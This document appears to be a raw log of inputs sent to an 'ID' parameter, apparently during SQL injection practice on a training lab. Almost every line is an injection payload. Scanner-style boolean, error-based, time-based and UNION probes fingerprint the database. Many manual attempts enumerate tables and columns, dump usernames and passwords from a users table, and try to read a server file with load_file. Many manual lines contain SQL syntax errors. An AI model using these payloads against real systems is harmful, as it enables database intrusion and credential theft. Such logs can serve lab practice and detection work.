ID:-6851' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
ID:-6185' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
ID:-2007' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
ID:-6929' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
ID:-4538' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7162786b71),NULL-- -
ID:1
ID:-6582' UNION ALL SELECT NULL,CONCAT(0x716a6a6b71,JSON_ARRAYAGG(CONCAT_WS(0x6b6a63627968,schema_name)),0x7162786b71),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1'
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1' and 1=1
ID:1' -- 
ID:1' order by 1,2,3 -- 
ID:1' order by union select 1,2,3 -- 
ID:1' and 1=2 order by union select 1,2,3 -- 
ID:1' and 1=2 order by union select 1,group_concat(table_name),3 -- 
ID:1'
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,user(),database() -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1,group_concat(colum_name),3 from information_schema.colums where table_name='users' -- 
ID:-1' union select 1,group_concat(colum_name),3 from information_schema.colums where table_name='users' -- 
ID:-1' union select 1,group_concat(colum_name),3 information_schema.colums where table_name='users' -- 
ID:-1' union select 1,group_concat(colum_name),3 from information_schema.colums where table_name='users' -- 
ID:-1' union select 1,group_concat(colum_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1,group_concat(username,password),3 from users -- 
ID:-1' union select 1,group_concat(username,0x3e,password),3 from users -- 
ID:-1' union select 1,2,load_file('/etc/password') -- 
ID:-1'
ID:1'
ID:1
ID:1‘ -- 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:4649
ID:1(..),")),'
ID:1'aDvpFy<'">aNMeyi
ID:1) AND 9509=7335 AND (2825=2825
ID:1) AND 1716=1716 AND (8640=8640
ID:1 AND 5897=9708
ID:1 AND 1716=1716
ID:1 AND 2489=4718-- HMpA
ID:1 AND 1716=1716-- ICHd
ID:1') AND 5596=8410 AND ('UZqe'='UZqe
ID:1') AND 1716=1716 AND ('sqEn'='sqEn
ID:1' AND 6049=6742 AND 'Hcbl'='Hcbl
ID:1' AND 1716=1716 AND 'idji'='idji
ID:1' AND 2033=4569 AND 'XeqJ'='XeqJ
ID:(SELECT CONCAT(CONCAT(0x7162767071,(CASE WHEN (2234=2234) THEN 0x31 ELSE 0x30 END)),0x717a786271))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(2449=2449,1))),0x717a786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'TAgC'='TAgC
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(1380=1380,1))),0x717a786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'zVgG'='zVgG
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(1272=1272,1))),0x717a786271,0x78))x)) AND 'jPUo'='jPUo
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162767071,(SELECT (ELT(4294=4294,1))),0x717a786271,0x78))x)) AND 'XNTO'='XNTO
ID:1' AND GTID_SUBSET(CONCAT(0x7162767071,(SELECT (ELT(6884=6884,1))),0x717a786271),6884) AND 'zYaO'='zYaO
ID:(SELECT CONCAT(0x7162767071,(ELT(7232=7232,1)),0x717a786271))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'IPMO'='IPMO
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))abUX)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))ukhu) AND 'iGNZ'='iGNZ
ID:1';SELECT BENCHMARK(5000000,MD5(0x6c61525a))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x52614a52)) AND 'IGuD'='IGuD
ID:1' AND (SELECT 3426 FROM (SELECT(SLEEP(5)))rwRS) AND 'vQsj'='vQsj
ID:1' AND (SELECT 3426 FROM (SELECT(SLEEP(0)))rwRS) AND 'vQsj'='vQsj
ID:1' AND (SELECT 3426 FROM (SELECT(SLEEP(5)))rwRS) AND 'vQsj'='vQsj
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 1003-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7162767071,0x5748636e4f4f6d7a576d755a6c427358647062787a496d65424666776641447777724a7366576568,0x717a786271),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x777861565948684954576867574343777a504969754347614c746551506174555a5a4959774c446c,0x717a786271)-- -
ID:1' UNION ALL SELECT CONCAT(0x7162767071,0x50566e5765774f706772717753756e666a666647495a5344414d6a5a4a4371505055664c76656d46,0x717a786271),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7162767071,0x477476536d784472744f,0x717a786271),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x495a6943736b68454378,0x717a786271)-- -
ID:1' UNION ALL SELECT CONCAT(0x7162767071,0x67674b6c767a6c537946,0x717a786271),NULL,NULL-- -
ID:-6713' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,0x4c5a52534a6b486e6b696856654f6c6a6d505a5575705a6f7779506978784d664966637262476450,0x717a786271)-- -
ID:-4016' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (8707=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8707) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-1533' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-6899' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-6511' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-9758' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-8035' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-7369' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a786271)-- -
ID:-9376' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,JSON_ARRAYAGG(CONCAT_WS(0x6f6c6d78716e,schema_name)),0x717a786271) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:-1'
ID:1
ID:1
ID:1/
ID:1'
ID:1
ID:1
ID:1'
ID:1'  order by 3 -- 
ID:1'  order by 4 -- 
ID:1'  order by 1 -- 
ID:1'  order by 2 -- 
ID:1'  order by 3-- 
ID:1'  order by  4 -- 
ID:1'  order by  3 -- 
ID:1' untion select  1,2,3 -- 
ID:-1' untion select  1,2,3 -- 
ID:-1' union select  1,2,3 -- 
ID:1' union select  1,2,3 -- 
ID:-1' union select  1,2,3 -- 
ID:0' union select  1,2,3 -- 
ID:-1' union select  1,2,3 -- 
ID:-1' union select  1,user(),database() -- 
ID:-1' union select  1,group_concat(table_name),3 form information_schema.tables where table_schema='database()' -- 
ID:-1' union select  1,group_concat(table_name),3 from information_schema.tables where table_schema='database()' -- 
ID:1
ID:1
ID:1
ID:1
ID:-8527' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,JSON_ARRAYAGG(CONCAT_WS(0x6f6c6d78716e,table_name)),0x717a786271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:1
ID:-9013' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,JSON_ARRAYAGG(CONCAT_WS(0x6f6c6d78716e,column_name,column_type)),0x717a786271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- -
ID:1
ID:-8387' UNION ALL SELECT NULL,NULL,CONCAT(0x7162767071,JSON_ARRAYAGG(CONCAT_WS(0x6f6c6d78716e,password,username)),0x717a786271) FROM `security`.users-- -
ID:1
ID:1
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,group_concat(tabule_name) -- 
ID:-1' union select 1,group_concat(table_name),3 form infortion_schema.tables where table schema=‘security’ -- 
ID:-1' union select 1,group_concat(table_name),3 form infortion_schema.tables where table_schema=‘security’ -- 
ID:-1' union select 1,group_concat(table_name),3 form information_schema.tables where table_schema=‘security’ -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- 
ID:-1' union select 1,group_concat(table_name),3information_schema tables where table_schema='security' -- 
ID:-1' union select 1,group_concat(table_name),3 frominformation_schema tables where table_schema='security' -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema tables where table_schema='security' -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- 
ID:-1' union select 1,group_concat(cloumn_name),3 from information_schema.cloumns where table_schema='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=user() -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select1,group_concat(column_name),3from information_schema columns where table_name='user'' -- 
ID:-1' union select1,group_concat(column_name),3from information_schema columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3 'from information_schema columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select1,2 group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- 
ID:-1' and 1=2 group_concat(username,password),3 from users -- 
ID:-1'union select 1,group_concat(username,password),3 from users -- 
ID:-1'union select 1,group_conct(table_name),from information_schema.tabls where table_name=user -- 
ID:-1'union select 1,group_conct(table_name),from information_schema.tabls where table_name=users -- 
ID:-1'union select 1,group_conct(table_name),from information_schema.tabls where table_name='user'
ID:-1'union select 1,group_conct(table_name),3 from information_schema.tables where table_name='user'
ID:-1' (union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- )
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select1,group_concat(column_name),3from information_schema columns where table_name=user() -- 
ID:-1' union select1,group_concat(column_name),3from information_schema columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3from information_schema columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),3from information_schema columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),3from information_schema columns where table_name='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema columns where table_name='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='user' -- 
ID:-1' union select 1,2,3 from information_schema.columns where table_name='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),from information_schema.columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema columns where table_name='users' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='user' --  -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='users' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=user() -- 
ID:-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='user' -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,2 group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,group_concat(column_name),from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=dababase() -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name and table_schema='user' -- 
ID:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='user' -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,,dababase() -- 
ID:-1' union select 1,2,database() -- 
ID:-1' union select 1,2,group_concat(table_name) form information_schema.tables where database() -- 
ID:-1' union select 1,2,group_concat(table_name) form information_schema.tables where table_name=database() -- 
ID:-1' union select 1,2,group_concat(table_name) form information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, group_concat(cloumn_name) ,3 from information_schema.cloumns where table_name='user' -- 
ID:-1' union select 1, group_concat(column_name) ,3 from information_schema.columns where table_name='user' -- 
ID:-1' union select 1, 2 ,3 group_concat(column) from information_schema.cloumns where table_name='user' -- 
ID:-1' union select 1, group_concat(column_name) ,3 from information_schema.columns where table_schema='user' -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, 2 ,3 group_concat(table_name) from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, 2 ,group_concat(table_name) from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, 2 ,group_concat(table_name) from information_schema.tables where table_schema=users -- 
ID:-1' union select 1, 2 ,group_concat(table_name) from information_schema.tables where table_schema=user -- 
ID:-1' union select 1, group_concat(column_name).3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(username,password),3 from users -- 
ID:-1' union select  1,2,tabase() -- 
ID:-1' union select 1, 2 ,tabase() -- 
ID:-1' union select 1, 2 ,database() -- 
ID:-1' union select 1, group_concat(table_name) ,3 form information_schema.tables where table_name=database() -- 
ID:-1' union select 1, group_concat(table_name) ,3 form information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, group_concat(column_name) ,3 from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(password,username) ,3 from users -- 
ID:-1' union select 1, group_concat(username,password) ,3 from users -- 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:2141
ID:1(")()(),'(
ID:1'aOXfyi<'">NIPwTe
ID:1) AND 9220=1266 AND (1816=1816
ID:1) AND 7676=7676 AND (8232=8232
ID:1 AND 2141=8451
ID:1 AND 7676=7676
ID:1 AND 3254=4545-- VFfE
ID:1 AND 7676=7676-- jHCD
ID:1') AND 1508=7812 AND ('icAY'='icAY
ID:1') AND 7676=7676 AND ('Srmg'='Srmg
ID:1' AND 8277=9286 AND 'OHlP'='OHlP
ID:1' AND 7676=7676 AND 'DKDc'='DKDc
ID:1' AND 8313=8091 AND 'YoNs'='YoNs
ID:(SELECT CONCAT(CONCAT(0x716b6a7a71,(CASE WHEN (4839=4839) THEN 0x31 ELSE 0x30 END)),0x716b6b7871))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6a7a71,(SELECT (ELT(8539=8539,1))),0x716b6b7871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'biix'='biix
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6a7a71,(SELECT (ELT(4472=4472,1))),0x716b6b7871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'XUDS'='XUDS
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716b6a7a71,(SELECT (ELT(3433=3433,1))),0x716b6b7871,0x78))x)) AND 'zRof'='zRof
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716b6a7a71,(SELECT (ELT(3026=3026,1))),0x716b6b7871,0x78))x)) AND 'KznJ'='KznJ
ID:1' AND GTID_SUBSET(CONCAT(0x716b6a7a71,(SELECT (ELT(4308=4308,1))),0x716b6b7871),4308) AND 'UpLF'='UpLF
ID:(SELECT CONCAT(0x716b6a7a71,(ELT(6424=6424,1)),0x716b6b7871))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'YrXX'='YrXX
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))XWAl)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))hEnm) AND 'qRQJ'='qRQJ
ID:1';SELECT BENCHMARK(5000000,MD5(0x64447678))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x5a536a7a)) AND 'PRpM'='PRpM
ID:1' AND (SELECT 5528 FROM (SELECT(SLEEP(5)))BRXt) AND 'tugQ'='tugQ
ID:1' AND (SELECT 5528 FROM (SELECT(SLEEP(0)))BRXt) AND 'tugQ'='tugQ
ID:1' AND (SELECT 5528 FROM (SELECT(SLEEP(5)))BRXt) AND 'tugQ'='tugQ
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2568-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7a71,0x564f784645484c51724e4e544a665455516f534d6a6a516b6f467846774777784e47476662654752,0x716b6b7871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b6a7a71,0x676d734e47686346426f49577a7669574849456b7446624c42554e4e7048574b54724d6d6645726b,0x716b6b7871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,0x61476f4e5671686669734c507a4375474c7a4154704441584d53466e4b554a514373737366596867,0x716b6b7871),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7a71,0x686f6d6a637378664142,0x716b6b7871)-- -
ID:1' UNION ALL SELECT CONCAT(0x716b6a7a71,0x67656159516f644b644f,0x716b6b7871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,0x5343714f474879467578,0x716b6b7871),NULL-- -
ID:-7827' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,0x52794f4a48796952774e5972426f4b5073724b43524a52676f4a7172787762624f68655255626454,0x716b6b7871),NULL-- -
ID:-3529' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (1071=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1071) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-9769' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-9063' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-6685' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-3303' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-6794' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-2483' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716b6b7871),NULL-- -
ID:-3357' UNION ALL SELECT NULL,CONCAT(0x716b6a7a71,JSON_ARRAYAGG(CONCAT_WS(0x736a62636376,schema_name)),0x716b6b7871),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1
ID:'
ID:'
ID:1'
ID:'
ID:1
ID:1'
ID:1
ID:1
ID:1
ID:1'
ID:1''
ID:1'
ID:1
ID:11
ID:1‘ --
ID:1‘
ID:1 and 1=2
ID:1 and 1=2 order by 1
ID:1 and 1=2 order by 10
ID:1 and 1=2 order by 20
ID:1 and 1=2 order by 50
ID:1'
ID:1' order by 10
ID:1' order by 1
ID:1 and 1=2
ID:1'
ID:1
ID:1'
ID:1''
ID:1'''
ID:1' order by 1
ID:1' order by 1--=
ID:1' order by 1-- 
ID:1' order by 10-- 
ID:1' order by 20-- 
ID:1' order by 5-- 
ID:1' order by 4-- 
ID:1' order by 3-- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2 -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 1,2,database() -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:1' union select 1,2,database() -- 
ID:-1' union select 1,2,database() -- 
ID:1' union select 1,2,database() -- 
ID:1' union select 1,2,database() -- 
ID:-2' union select 1,2,database() -- 
ID:-1' union select 1,2,database() -- 
ID:-1
ID:-1' order by 3 -- 
ID:-1' order by 4 -- 
ID:-1' order by 3 -- 
ID: -1' 
ID: -1' -- 
ID:-1' union select 1,2,3 -- 
ID:-1' union select 2,3 -- 
ID:-1' union select * -- 
ID:-1' union select database() --
ID:-1' union select 1,1database() -- 
ID:-1' union select 1,1,database() -- 
ID:-1' union select 2,2,database() -- 
ID:1 and 1=2
ID:1 and 1=2
ID:1 and 1=2
ID:'1 and 1=2'
ID:'1 and 1=2'
ID:1 and 1=2'
ID:1 and 1=2' -- 
ID:1 and 1=1
ID:1 and 1=2
ID:-1' union select *,*,database() -- 
ID:-1' union select *,1,database() -- 
ID:-1' union select 2,1,database() -- 
ID:-1' union select 1,1,database() -- 
ID:-1' union select id,group_concat(name),database() -- 
ID:-1' union select 1,group_concat(name),database() -- 
ID:-1' union select 1,group_concat(table_name),database() -- 
ID:-1' union select 1,2,database() -- 
ID:-1' union select 1,table(),database() -- 
ID:-1' union select 1,group_concat(table_name),3 -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, group_concat(table_name) ,database() from information_schema.tables where table_schema=database() -- 
ID:-1' union select (1, group_concat(table_name) ,database() from information_schema.tables where table_schema=database()) -- 
ID:-1' union select 1, group_concat(table_name) ,database() from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1,2,database() -- 
ID:-1' union select 1, group_concat(table_name) ,database() from information_schema.tables where table_schema=database() -- 
ID:-1' union select1,group_concat(column_name),3 from information_schema.columns where table_name='user' -- 
ID:-1' union select 1, group_concat(column_name), database() from information_schema.columns where table_name='user' -- 
ID:-1' union select 1, group_concat(column_name), group_concat(table_name) from information_schema.columns where table_name='user' -- 
ID:-1' union select 1, group_concat(column_name), database() from information_schema.columns where table_name='user' -- 
ID:-1' union select 1, group_concat(table_name) ,database() from information_schema.tables where table_schema=database() -- 
ID:-1' union select 1, group_concat(column_name), database() from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema=security -- 
ID:-1' union select 1, group_concat(table_name) ,3 from information_schema.tables where table_schema='security' -- 
ID:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- 
ID:-1' union select 1, group_concat(column_name), database() from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(users), group_concat(password) from security.users where table_name='users' -- 
ID:-1' union select 1, group_concat(users), group_concat(password) from users -- 
ID:-1' union select 1, group_concat(users), group_concat(password) from security.users -- 
ID:-1' union select 1, group_concat(column_name), database() from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(username), group_concat(password) from security.users
ID:-1' union select 1, group_concat(username), group_concat(password) from security.users -- 
ID:-1' union select 1, group_concat(username), group_concat(password) from security.users -- 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:2488
ID:1,,,."')(,)
ID:1'vMtneK<'">vLGNfW
ID:1) AND 9901=2125 AND (1167=1167
ID:1) AND 8467=8467 AND (7820=7820
ID:1 AND 1886=6989
ID:1 AND 8467=8467
ID:1 AND 1067=2298-- urSc
ID:1 AND 8467=8467-- vXQt
ID:1') AND 6901=6901 AND ('WpFZ'='WpFZ
ID:1') AND 8467=8467 AND ('nNpH'='nNpH
ID:1' AND 1958=3636 AND 'bwep'='bwep
ID:1' AND 8467=8467 AND 'ddgr'='ddgr
ID:1' AND 4037=7641 AND 'XrGt'='XrGt
ID:(SELECT CONCAT(CONCAT(0x71706b6a71,(CASE WHEN (3923=3923) THEN 0x31 ELSE 0x30 END)),0x717a707a71))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71706b6a71,(SELECT (ELT(2405=2405,1))),0x717a707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'BuwQ'='BuwQ
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71706b6a71,(SELECT (ELT(9627=9627,1))),0x717a707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'bNKU'='bNKU
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71706b6a71,(SELECT (ELT(5901=5901,1))),0x717a707a71,0x78))x)) AND 'mSAE'='mSAE
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71706b6a71,(SELECT (ELT(4587=4587,1))),0x717a707a71,0x78))x)) AND 'ZSUZ'='ZSUZ
ID:1' AND GTID_SUBSET(CONCAT(0x71706b6a71,(SELECT (ELT(9137=9137,1))),0x717a707a71),9137) AND 'UDFq'='UDFq
ID:(SELECT CONCAT(0x71706b6a71,(ELT(2574=2574,1)),0x717a707a71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'xOcQ'='xOcQ
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))zeBe)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))wpmh) AND 'cbIc'='cbIc
ID:1';SELECT BENCHMARK(5000000,MD5(0x6a68424a))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x714d434e)) AND 'GKfp'='GKfp
ID:1' AND (SELECT 2759 FROM (SELECT(SLEEP(5)))NazG) AND 'qTUG'='qTUG
ID:1' AND (SELECT 2759 FROM (SELECT(SLEEP(0)))NazG) AND 'qTUG'='qTUG
ID:1' AND (SELECT 2759 FROM (SELECT(SLEEP(5)))NazG) AND 'qTUG'='qTUG
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2985-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT CONCAT(0x71706b6a71,0x636372486f465776477349594247516a5a785541715959496d53644653484e4c4550486c70716454,0x717a707a71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x686d486a714749475645446859645a654b694478445a6851454e6b64526d64546b4f556f69657041,0x717a707a71),NULL-- -
